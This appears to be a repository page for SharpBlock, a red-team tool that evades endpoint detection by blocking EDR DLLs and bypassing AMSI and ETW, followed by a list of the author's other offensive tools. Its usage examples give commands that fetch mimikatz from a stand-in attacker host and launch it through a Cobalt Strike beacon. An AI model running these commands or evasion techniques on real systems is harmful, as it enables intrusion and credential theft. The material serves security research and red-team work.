  • Stars: 1,057
  • Rank 42,603 (Top 0.9 %)
  • Language: C#
  • Created about 4 years ago
  • Updated about 3 years ago

Repository Details

A method of bypassing EDRs' active protection DLLs by preventing entry point execution.

SharpBlock

Features

  • Blocks execution of the EDR DLL's entry point, which prevents the EDR from placing its hooks.
  • Patchless AMSI bypass that is not detectable by scanners looking for code patches in Amsi.dll at runtime.
  • The host process is replaced with an implant PE that can be loaded from disk, over HTTP or from a named pipe (Cobalt Strike).
  • The implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line arguments are spoofed and implanted after process creation, using a method designed to evade EDR detection.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory calls when the caller lies within the address range of a blocked DLL.

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the launched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypass
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note: the upload_file beacon command requires loading upload.cna into Cobalt Strike's Script Manager.

Accompanying Blog Posts:

More Repositories

  1. SweetPotato (C#, 1,463 stars): Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019
  2. BeaconEye (C#, 828 stars): Hunts out CobaltStrike beacons and logs operator command output
  3. ThreadlessInject (C#, 663 stars): Threadless process injection using remote function hooking
  4. BOF.NET (C, 608 stars): A .NET runtime for Cobalt Strike's Beacon Object Files
  5. lsarelayx (C++, 513 stars): NTLM relaying for Windows made easy
  6. Volumiser (C#, 318 stars)
  7. MirrorDump (C#, 258 stars): Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory
  8. MinHook.NET (C#, 194 stars): A C# port of the MinHook API hooking library
  9. goreflect (C, 163 stars): Reflective DLL loading of your favorite Golang program
  10. SylantStrike (C, 147 stars): Simple EDR implementation to demonstrate bypass
  11. gssapi-abuse (Python, 127 stars): A tool for enumerating potential hosts that are open to GSSAPI abuse within Active Directory networks
  12. PIVert (C#, 96 stars)
  13. dnMerge (C#, 93 stars): A lightweight .NET assembly dependency merger that uses dnLib and 7zip's LZMA SDK for compressing dependent assemblies
  14. PinSwipe (C, 71 stars): Smart Card PIN swiping DLL
  15. gookies (Go, 48 stars): A Chrome cookie dumping utility
  16. PwnyForm (C#, 41 stars)
  17. ProvisionAppx (C#, 34 stars)
  18. bittrex4j (Java, 31 stars): Java library for accessing the Bittrex Web APIs and WebSockets
  19. PoC (Python, 23 stars): Exploit PoCs for CVEs and non-CVEs alike
  20. Jboss-Wilfly-Hashes-to-Hashcat (Python, 12 stars): Converts a JBoss/WildFly management users properties file to a hashcat format compatible with mode 20
  21. VulnHub (Python, 4 stars): VulnHub walkthroughs
  22. MediaPortal-AsteriskCid (C#, 1 star)